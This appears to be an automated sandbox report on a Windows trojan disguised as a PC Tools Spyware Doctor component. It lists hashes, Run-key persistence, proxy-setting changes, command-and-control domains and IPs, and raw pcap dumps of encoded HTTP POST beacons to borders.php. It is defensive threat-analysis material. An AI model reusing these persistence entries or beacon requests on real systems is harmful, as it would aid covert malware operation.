Analysis Date: 2013-09-07 00:35:38
MD5: 5061743eac986bb8cf4fdfffd1747a35
SHA1: 88b9ef35c42cfc57ea2c114ca3d05228a5e7fd1d

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: b1b186fbe841455d5ab777df9fbb713b sha1: 52624148ec4c9cb7b4f349acd0aa34fa04c28b7f size: 12288
Section.rdata md5: 0f343b0931126a20f133d67c2b018a3b sha1: 60cacbf3d72e1e7834203da608037b1bf83b40e8 size: 1024
Section.data md5: 7feed4281882843d2a662b4e7420c97e sha1: ca593f3e3e29f8a5a451fde7cca4f51f5dfe2007 size: 113152
Section.rsrc md5: d9ecc755db4ecf1e706c3e636dd5e141 sha1: 28529f10fb22be1f8d548d1657e0ad06139b50bd size: 5120
Timestamp: 2009-04-26 17:21:27
Version
LegalCopyright: Copyright © 2010 l PC Tools. All rights reserved. 2m
InternalName: tdama5
FileVersion: 7.0.0.61
CompanyName: PC Tools
LegalTrademarks:
Comments:
ProductName:
ProductVersion: 7.0.0.61
FileDescription: TMSpyware Doctor Component
OriginalFilename: tdama5
PEhash: 6f96f6b8fcf0f1605f0d9b5647b50cb2931db08a
AV avira: TR/Ginerez.SE
AV avg: Generic31.EBG

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\0ESKOMO9JO ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\0ESKOMO9JO\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: 121.64.3.46
Winsock DNS: falallen.com
Winsock DNS: topkio.com

Network Details:

DNSwsj.com
Type: A
205.203.132.1
DNSwsj.com
Type: A
205.203.132.65
DNSwsj.com
Type: A
205.203.140.1
DNSwsj.com
Type: A
205.203.140.65
DNSfastclick.com
Type: A
64.156.167.84
DNSnifty.com
Type: A
210.131.4.217
DNSfalallen.com
Type: A
69.43.161.167
DNSphreeway.com
Type: A
107.20.206.69
DNStopkio.com
Type: A
DNStirefondn.com
Type: A
HTTP POSThttp://falallen.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POSThttp://121.64.3.46/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 69.43.161.167:80
Flows TCP192.168.1.1:1032 ➝ 121.64.3.46:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   66616c61 6c6c656e 2e636f6d 0d0a436f   falallen.com..Co
0x000000b0 (00176)   6e74656e 742d4c65 6e677468 3a203334   ntent-Length: 34
0x000000c0 (00192)   310d0a43 6f6e6e65 6374696f 6e3a204b   1..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a6461 74613d2f 436a4566   he....data=/CjEf
0x00000100 (00256)   5a445376 78714369 4b306c34 304d7937   ZDSvxqCiK0l40My7
0x00000110 (00272)   53766a7a 2b456436 746b5a6d 417a3971   Svjz+Ed6tkZmAz9q
0x00000120 (00288)   32546e67 51512f6e 5a6c702f 70427376   2TngQQ/nZlp/pBsv
0x00000130 (00304)   5a436646 37726942 6b472f67 2b375643   ZCfF7riBkG/g+7VC
0x00000140 (00320)   432f3070 55336b4f 48703765 52634850   C/0pU3kOHp7eRcHP
0x00000150 (00336)   69596f39 39304d55 756a6755 57346276   iYo990MUujgUW4bv
0x00000160 (00352)   5449644e 2f6a5058 7547506a 61427a78   TIdN/jPXuGPjaBzx
0x00000170 (00368)   6c636335 6d704e30 31613674 2f516953   lcc5mpN01a6t/QiS
0x00000180 (00384)   58587770 7a39486d 306b7a39 66426661   XXwpz9Hm0kz9fBfa
0x00000190 (00400)   556e3130 782f474c 636f6652 6948344c   Un10x/GLcofRiH4L
0x000001a0 (00416)   76467341 69475946 7361696f 4d573037   vFsAiGYFsaioMW07
0x000001b0 (00432)   4b304533 726b6b33 4d655a55 79674465   K0E3rkk3MeZUygDe
0x000001c0 (00448)   4c477732 7331322b 6f504d4e 726e4a5a   LGw2s12+oPMNrnJZ
0x000001d0 (00464)   637a687a 5a387869 4e577535 54674f68   czhzZ8xiNWu5TgOh
0x000001e0 (00480)   71344f71 55533042 4d54644b 32625a79   q4OqUS0BMTdK2bZy
0x000001f0 (00496)   2f687833 546e6d47 7954464c 48684c63   /hx3TnmGyTFLHhLc
0x00000200 (00512)   52662b76 417a494f 424e6d76 34334344   Rf+vAzIOBNmv43CD
0x00000210 (00528)   4b325130 35415663 6d413832 4b685466   K2Q05AVcmA82KhTf
0x00000220 (00544)   5573732f 476f6c77 786c6d39 6b4c6e72   Uss/Golwxlm9kLnr
0x00000230 (00560)   6e6c4936 7034366e 3336642f 33346b70   nlI6p46n36d/34kp
0x00000240 (00576)   56563262 7151672f 513d3d              VV2bqQg/Q==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   3132312e 36342e33 2e34360d 0a436f6e   121.64.3.46..Con
0x000000b0 (00176)   74656e74 2d4c656e 6774683a 20333431   tent-Length: 341
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000d0 (00208)   65702d41 6c697665 0d0a4361 6368652d   ep-Alive..Cache-
0x000000e0 (00224)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000000f0 (00240)   650d0a0d 0a646174 613d2f43 6a45665a   e....data=/CjEfZ
0x00000100 (00256)   44537678 7143694b 306c3430 4d793753   DSvxqCiK0l40My7S
0x00000110 (00272)   766a7a2b 45643674 6b5a6d41 7a397132   vjz+Ed6tkZmAz9q2
0x00000120 (00288)   546e6751 512f6e5a 6c702f70 4273765a   TngQQ/nZlp/pBsvZ
0x00000130 (00304)   43664637 7269426b 472f672b 37564343   CfF7riBkG/g+7VCC
0x00000140 (00320)   2f307055 336b4f48 70376552 63485069   /0pU3kOHp7eRcHPi
0x00000150 (00336)   596f3939 304d5575 6a675557 34627654   Yo990MUujgUW4bvT
0x00000160 (00352)   49644e2f 6a505875 47506a61 427a786c   IdN/jPXuGPjaBzxl
0x00000170 (00368)   6363356d 704e3031 6136742f 51695358   cc5mpN01a6t/QiSX
0x00000180 (00384)   5877707a 39486d30 6b7a3966 42666155   Xwpz9Hm0kz9fBfaU
0x00000190 (00400)   6e313078 2f474c63 6f665269 48344c76   n10x/GLcofRiH4Lv
0x000001a0 (00416)   46734169 47594673 61696f4d 5730374b   FsAiGYFsaioMW07K
0x000001b0 (00432)   30453372 6b6b334d 655a5579 6744654c   0E3rkk3MeZUygDeL
0x000001c0 (00448)   47773273 31322b6f 504d4e72 6e4a5a63   Gw2s12+oPMNrnJZc
0x000001d0 (00464)   7a687a5a 3878694e 57753554 674f6871   zhzZ8xiNWu5TgOhq
0x000001e0 (00480)   344f7155 5330424d 54644b32 625a792f   4OqUS0BMTdK2bZy/
0x000001f0 (00496)   68783354 6e6d4779 54464c48 684c6352   hx3TnmGyTFLHhLcR
0x00000200 (00512)   662b7641 7a494f42 4e6d7634 3343444b   f+vAzIOBNmv43CDK
0x00000210 (00528)   32513035 4156636d 4138324b 68546655   2Q05AVcmA82KhTfU
0x00000220 (00544)   73732f47 6f6c7778 6c6d396b 4c6e726e   ss/Golwxlm9kLnrn
0x00000230 (00560)   6c493670 34366e33 36642f33 346b7056   lI6p46n36d/34kpV
0x00000240 (00576)   56326271 51672f51 3d3d3d              V2bqQg/Q===


Strings